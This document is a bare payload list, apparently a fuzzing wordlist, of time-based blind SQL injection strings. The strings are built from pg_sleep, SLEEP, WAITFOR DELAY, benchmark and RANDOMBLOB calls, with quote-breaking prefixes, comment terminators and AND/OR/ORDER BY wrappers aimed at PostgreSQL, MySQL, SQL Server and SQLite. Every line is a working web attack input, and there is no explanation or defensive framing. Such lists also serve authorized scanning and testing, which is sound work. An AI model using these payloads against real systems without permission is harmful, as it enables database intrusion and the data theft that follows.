' AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))YjoC) AND %=
' AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))YjoC) AND %=
' AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))YjoC) AND '%'='
" AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))YjoC) AND "%"="
 AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)
' AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)
" AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)
 AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)
' AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)
" AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)
 AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)
' AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)
" AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)
 AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
" AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
 AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)
' AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)
" AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)
 AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)
' AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)
" AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)
 AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)
' AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)
" AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)
 AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)
' AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)
" AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)
 AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)
' AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)
" AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)
 AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)--
' AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)--
" AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)--
 AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)--
' AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)--
" AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)--
 AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)--
' AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)--
" AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)--
 AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
" AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
 AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)--
' AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)--
" AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)--
 AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)--
' AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)--
" AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)--
 AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)--
' AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)--
" AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)--
 AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)--
' AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)--
" AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)--
 AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)--
' AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)--
" AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)--
 AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)#
' AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)#
" AND (SELECT * FROM (SELECT(pg_sleep(10)))nQIP)#
 AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)#
' AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)#
" AND (SELECT * FROM (SELECT(SELECT pg_sleep(10)))nQIP)#
 AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)#
' AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)#
" AND (SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))nQIP)#
 AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
" AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
 AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)#
' AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)#
" AND (SELECT * FROM (SELECT(SELECT SLEEP(5)))nQIP)#
 AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)#
' AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)#
" AND (SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))nQIP)#
 AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)#
' AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)#
" AND (SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))nQIP)#
 AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)#
' AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)#
" AND (SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))nQIP)#
 AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)#
' AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)#
" AND (SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))nQIP)#
pg_sleep(10)=
pg_sleep(10)='
pg_sleep(10)="
SELECT pg_sleep(10)=
SELECT pg_sleep(10)='
SELECT pg_sleep(10)="
UNION SELECT pg_sleep(10)=
UNION SELECT pg_sleep(10)='
UNION SELECT pg_sleep(10)="
SLEEP(5)=
SLEEP(5)='
SLEEP(5)="
SELECT SLEEP(5)=
SELECT SLEEP(5)='
SELECT SLEEP(5)="
UNION SELECT SLEEP(5)=
UNION SELECT SLEEP(5)='
UNION SELECT SLEEP(5)="
WAITFOR DELAY '0:0:5'=
WAITFOR DELAY '0:0:5'='
WAITFOR DELAY '0:0:5'="
WAITFOR DELAY "0:0:5"=
WAITFOR DELAY "0:0:5"='
WAITFOR DELAY "0:0:5"="
benchmark(50000000,MD5(1))=
benchmark(50000000,MD5(1))='
benchmark(50000000,MD5(1))="
or pg_sleep(10)
or SELECT pg_sleep(10)
or UNION SELECT pg_sleep(10)
or SLEEP(5)
or SELECT SLEEP(5)
or UNION SELECT SLEEP(5)
or WAITFOR DELAY '0:0:5'
or WAITFOR DELAY "0:0:5"
or benchmark(50000000,MD5(1))
or pg_sleep(10)--
or SELECT pg_sleep(10)--
or UNION SELECT pg_sleep(10)--
or SLEEP(5)--
or SELECT SLEEP(5)--
or UNION SELECT SLEEP(5)--
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY "0:0:5"--
or benchmark(50000000,MD5(1))--
or pg_sleep(10)#
or SELECT pg_sleep(10)#
or UNION SELECT pg_sleep(10)#
or SLEEP(5)#
or SELECT SLEEP(5)#
or UNION SELECT SLEEP(5)#
or WAITFOR DELAY '0:0:5'#
or WAITFOR DELAY "0:0:5"#
or benchmark(50000000,MD5(1))#
or pg_sleep(10)=
or pg_sleep(10)='
or pg_sleep(10)="
or SELECT pg_sleep(10)=
or SELECT pg_sleep(10)='
or SELECT pg_sleep(10)="
or UNION SELECT pg_sleep(10)=
or UNION SELECT pg_sleep(10)='
or UNION SELECT pg_sleep(10)="
or SLEEP(5)=
or SLEEP(5)='
or SLEEP(5)="
or SELECT SLEEP(5)=
or SELECT SLEEP(5)='
or SELECT SLEEP(5)="
or UNION SELECT SLEEP(5)=
or UNION SELECT SLEEP(5)='
or UNION SELECT SLEEP(5)="
or WAITFOR DELAY '0:0:5'=
or WAITFOR DELAY '0:0:5'='
or WAITFOR DELAY '0:0:5'="
or WAITFOR DELAY "0:0:5"=
or WAITFOR DELAY "0:0:5"='
or WAITFOR DELAY "0:0:5"="
or benchmark(50000000,MD5(1))=
or benchmark(50000000,MD5(1))='
or benchmark(50000000,MD5(1))="
pg_sleep(10)
SELECT pg_sleep(10)
UNION SELECT pg_sleep(10)
SLEEP(5)
SELECT SLEEP(5)
UNION SELECT SLEEP(5)
WAITFOR DELAY '0:0:5'
WAITFOR DELAY "0:0:5"
benchmark(50000000,MD5(1))
\
'\'
"\"
AnD pg_sleep(10)
AnD SELECT pg_sleep(10)
AnD UNION SELECT pg_sleep(10)
AnD SLEEP(5)
AnD SELECT SLEEP(5)
AnD UNION SELECT SLEEP(5)
AnD WAITFOR DELAY '0:0:5'
AnD WAITFOR DELAY "0:0:5"
AnD benchmark(50000000,MD5(1))
AnD pg_sleep(10)--
AnD SELECT pg_sleep(10)--
AnD UNION SELECT pg_sleep(10)--
AnD SLEEP(5)--
AnD SELECT SLEEP(5)--
AnD UNION SELECT SLEEP(5)--
AnD WAITFOR DELAY '0:0:5'--
AnD WAITFOR DELAY "0:0:5"--
AnD benchmark(50000000,MD5(1))--
AnD pg_sleep(10)#
AnD SELECT pg_sleep(10)#
AnD UNION SELECT pg_sleep(10)#
AnD SLEEP(5)#
AnD SELECT SLEEP(5)#
AnD UNION SELECT SLEEP(5)#
AnD WAITFOR DELAY '0:0:5'#
AnD WAITFOR DELAY "0:0:5"#
AnD benchmark(50000000,MD5(1))#
&&pg_sleep(10)
&&SELECT pg_sleep(10)
&&UNION SELECT pg_sleep(10)
&&SLEEP(5)
&&SELECT SLEEP(5)
&&UNION SELECT SLEEP(5)
&&WAITFOR DELAY '0:0:5'
&&WAITFOR DELAY "0:0:5"
&&benchmark(50000000,MD5(1))
&&pg_sleep(10)--
&&SELECT pg_sleep(10)--
&&UNION SELECT pg_sleep(10)--
&&SLEEP(5)--
&&SELECT SLEEP(5)--
&&UNION SELECT SLEEP(5)--
&&WAITFOR DELAY '0:0:5'--
&&WAITFOR DELAY "0:0:5"--
&&benchmark(50000000,MD5(1))--
&&pg_sleep(10)#
&&SELECT pg_sleep(10)#
&&UNION SELECT pg_sleep(10)#
&&SLEEP(5)#
&&SELECT SLEEP(5)#
&&UNION SELECT SLEEP(5)#
&&WAITFOR DELAY '0:0:5'#
&&WAITFOR DELAY "0:0:5"#
&&benchmark(50000000,MD5(1))#
 AnD pg_sleep(10) ANd 1
' AnD pg_sleep(10) ANd '1
" AnD pg_sleep(10) ANd "1
 AnD SELECT pg_sleep(10) ANd 1
' AnD SELECT pg_sleep(10) ANd '1
" AnD SELECT pg_sleep(10) ANd "1
 AnD UNION SELECT pg_sleep(10) ANd 1
' AnD UNION SELECT pg_sleep(10) ANd '1
" AnD UNION SELECT pg_sleep(10) ANd "1
 AnD SLEEP(5) ANd 1
' AnD SLEEP(5) ANd '1
" AnD SLEEP(5) ANd "1
 AnD SELECT SLEEP(5) ANd 1
' AnD SELECT SLEEP(5) ANd '1
" AnD SELECT SLEEP(5) ANd "1
 AnD UNION SELECT SLEEP(5) ANd 1
' AnD UNION SELECT SLEEP(5) ANd '1
" AnD UNION SELECT SLEEP(5) ANd "1
 AnD WAITFOR DELAY '0:0:5' ANd 1
' AnD WAITFOR DELAY '0:0:5' ANd '1
" AnD WAITFOR DELAY '0:0:5' ANd "1
 AnD WAITFOR DELAY "0:0:5" ANd 1
' AnD WAITFOR DELAY "0:0:5" ANd '1
" AnD WAITFOR DELAY "0:0:5" ANd "1
 AnD benchmark(50000000,MD5(1)) ANd 1
' AnD benchmark(50000000,MD5(1)) ANd '1
" AnD benchmark(50000000,MD5(1)) ANd "1
&&pg_sleep(10)&&1
'&&pg_sleep(10)&&'1
"&&pg_sleep(10)&&"1
&&SELECT pg_sleep(10)&&1
'&&SELECT pg_sleep(10)&&'1
"&&SELECT pg_sleep(10)&&"1
&&UNION SELECT pg_sleep(10)&&1
'&&UNION SELECT pg_sleep(10)&&'1
"&&UNION SELECT pg_sleep(10)&&"1
&&SLEEP(5)&&1
'&&SLEEP(5)&&'1
"&&SLEEP(5)&&"1
&&SELECT SLEEP(5)&&1
'&&SELECT SLEEP(5)&&'1
"&&SELECT SLEEP(5)&&"1
&&UNION SELECT SLEEP(5)&&1
'&&UNION SELECT SLEEP(5)&&'1
"&&UNION SELECT SLEEP(5)&&"1
&&WAITFOR DELAY '0:0:5'&&1
'&&WAITFOR DELAY '0:0:5'&&'1
"&&WAITFOR DELAY '0:0:5'&&"1
&&WAITFOR DELAY "0:0:5"&&1
'&&WAITFOR DELAY "0:0:5"&&'1
"&&WAITFOR DELAY "0:0:5"&&"1
&&benchmark(50000000,MD5(1))&&1
'&&benchmark(50000000,MD5(1))&&'1
"&&benchmark(50000000,MD5(1))&&"1
ORDER BY pg_sleep(10)
ORDER BY SELECT pg_sleep(10)
ORDER BY UNION SELECT pg_sleep(10)
ORDER BY SLEEP(5)
ORDER BY SELECT SLEEP(5)
ORDER BY UNION SELECT SLEEP(5)
ORDER BY WAITFOR DELAY '0:0:5'
ORDER BY WAITFOR DELAY "0:0:5"
ORDER BY benchmark(50000000,MD5(1))
ORDER BY pg_sleep(10)--
ORDER BY SELECT pg_sleep(10)--
ORDER BY UNION SELECT pg_sleep(10)--
ORDER BY SLEEP(5)--
ORDER BY SELECT SLEEP(5)--
ORDER BY UNION SELECT SLEEP(5)--
ORDER BY WAITFOR DELAY '0:0:5'--
ORDER BY WAITFOR DELAY "0:0:5"--
ORDER BY benchmark(50000000,MD5(1))--
ORDER BY pg_sleep(10)#
ORDER BY SELECT pg_sleep(10)#
ORDER BY UNION SELECT pg_sleep(10)#
ORDER BY SLEEP(5)#
ORDER BY SELECT SLEEP(5)#
ORDER BY UNION SELECT SLEEP(5)#
ORDER BY WAITFOR DELAY '0:0:5'#
ORDER BY WAITFOR DELAY "0:0:5"#
ORDER BY benchmark(50000000,MD5(1))#
(SELECT * FROM (SELECT(pg_sleep(10)))ecMj)
(SELECT * FROM (SELECT(SELECT pg_sleep(10)))ecMj)
(SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SELECT SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))ecMj)
(SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))ecMj)
(SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))ecMj)
(SELECT * FROM (SELECT(pg_sleep(10)))ecMj)--
(SELECT * FROM (SELECT(SELECT pg_sleep(10)))ecMj)--
(SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))ecMj)--
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
(SELECT * FROM (SELECT(SELECT SLEEP(5)))ecMj)--
(SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))ecMj)--
(SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))ecMj)--
(SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))ecMj)--
(SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))ecMj)--
(SELECT * FROM (SELECT(pg_sleep(10)))ecMj)#
(SELECT * FROM (SELECT(SELECT pg_sleep(10)))ecMj)#
(SELECT * FROM (SELECT(UNION SELECT pg_sleep(10)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SELECT SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(UNION SELECT SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(WAITFOR DELAY '0:0:5'))ecMj)#
(SELECT * FROM (SELECT(WAITFOR DELAY "0:0:5"))ecMj)#
(SELECT * FROM (SELECT(benchmark(50000000,MD5(1))))ecMj)#
+benchmark(3200,SHA1(1))+
+benchmark(3200,SHA1(1))+'
+benchmark(3200,SHA1(1))+"
+ pg_sleep(10) + 
+ pg_sleep(10) + '
+ pg_sleep(10) + "
+ SELECT pg_sleep(10) + 
+ SELECT pg_sleep(10) + '
+ SELECT pg_sleep(10) + "
+ UNION SELECT pg_sleep(10) + 
+ UNION SELECT pg_sleep(10) + '
+ UNION SELECT pg_sleep(10) + "
+ SLEEP(5) + 
+ SLEEP(5) + '
+ SLEEP(5) + "
+ SELECT SLEEP(5) + 
+ SELECT SLEEP(5) + '
+ SELECT SLEEP(5) + "
+ UNION SELECT SLEEP(5) + 
+ UNION SELECT SLEEP(5) + '
+ UNION SELECT SLEEP(5) + "
+ WAITFOR DELAY '0:0:5' + 
+ WAITFOR DELAY '0:0:5' + '
+ WAITFOR DELAY '0:0:5' + "
+ WAITFOR DELAY "0:0:5" + 
+ WAITFOR DELAY "0:0:5" + '
+ WAITFOR DELAY "0:0:5" + "
+ benchmark(50000000,MD5(1)) + 
+ benchmark(50000000,MD5(1)) + '
+ benchmark(50000000,MD5(1)) + "
RANDOMBLOB(500000000/2)
AND 2947=LIKE(ABCDEFG,UPPER(HEX(RANDOMBLOB(500000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
AND 2947=LIKE("ABCDEFG",UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE(ABCDEFG,UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE("ABCDEFG",UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE(ABCDEFG,UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 2947=LIKE("ABCDEFG",UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE(ABCDEFG,UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE("ABCDEFG",UPPER(HEX(RANDOMBLOB(1000000000/2))))
pg_sleep(10)/* or pg_sleep(10) or  or pg_sleep(10) or */
pg_sleep(10)/*' or pg_sleep(10) or '' or pg_sleep(10) or '*/
pg_sleep(10)/*" or pg_sleep(10) or "" or pg_sleep(10) or "*/
SELECT pg_sleep(10)/* or SELECT pg_sleep(10) or  or SELECT pg_sleep(10) or */
SELECT pg_sleep(10)/*' or SELECT pg_sleep(10) or '' or SELECT pg_sleep(10) or '*/
SELECT pg_sleep(10)/*" or SELECT pg_sleep(10) or "" or SELECT pg_sleep(10) or "*/
UNION SELECT pg_sleep(10)/* or UNION SELECT pg_sleep(10) or  or UNION SELECT pg_sleep(10) or */
UNION SELECT pg_sleep(10)/*' or UNION SELECT pg_sleep(10) or '' or UNION SELECT pg_sleep(10) or '*/
UNION SELECT pg_sleep(10)/*" or UNION SELECT pg_sleep(10) or "" or UNION SELECT pg_sleep(10) or "*/
SLEEP(5)/* or SLEEP(5) or  or SLEEP(5) or */
SLEEP(5)/*' or SLEEP(5) or '' or SLEEP(5) or '*/
SLEEP(5)/*" or SLEEP(5) or "" or SLEEP(5) or "*/
SELECT SLEEP(5)/* or SELECT SLEEP(5) or  or SELECT SLEEP(5) or */
SELECT SLEEP(5)/*' or SELECT SLEEP(5) or '' or SELECT SLEEP(5) or '*/
SELECT SLEEP(5)/*" or SELECT SLEEP(5) or "" or SELECT SLEEP(5) or "*/
UNION SELECT SLEEP(5)/* or UNION SELECT SLEEP(5) or  or UNION SELECT SLEEP(5) or */
UNION SELECT SLEEP(5)/*' or UNION SELECT SLEEP(5) or '' or UNION SELECT SLEEP(5) or '*/
UNION SELECT SLEEP(5)/*" or UNION SELECT SLEEP(5) or "" or UNION SELECT SLEEP(5) or "*/
WAITFOR DELAY '0:0:5'/* or WAITFOR DELAY '0:0:5' or  or WAITFOR DELAY '0:0:5' or */
WAITFOR DELAY '0:0:5'/*' or WAITFOR DELAY '0:0:5' or '' or WAITFOR DELAY '0:0:5' or '*/
WAITFOR DELAY '0:0:5'/*" or WAITFOR DELAY '0:0:5' or "" or WAITFOR DELAY '0:0:5' or "*/
WAITFOR DELAY "0:0:5"/* or WAITFOR DELAY "0:0:5" or  or WAITFOR DELAY "0:0:5" or */
WAITFOR DELAY "0:0:5"/*' or WAITFOR DELAY "0:0:5" or '' or WAITFOR DELAY "0:0:5" or '*/
WAITFOR DELAY "0:0:5"/*" or WAITFOR DELAY "0:0:5" or "" or WAITFOR DELAY "0:0:5" or "*/
benchmark(50000000,MD5(1))/* or benchmark(50000000,MD5(1)) or  or benchmark(50000000,MD5(1)) or */
benchmark(50000000,MD5(1))/*' or benchmark(50000000,MD5(1)) or '' or benchmark(50000000,MD5(1)) or '*/
benchmark(50000000,MD5(1))/*" or benchmark(50000000,MD5(1)) or "" or benchmark(50000000,MD5(1)) or "*/
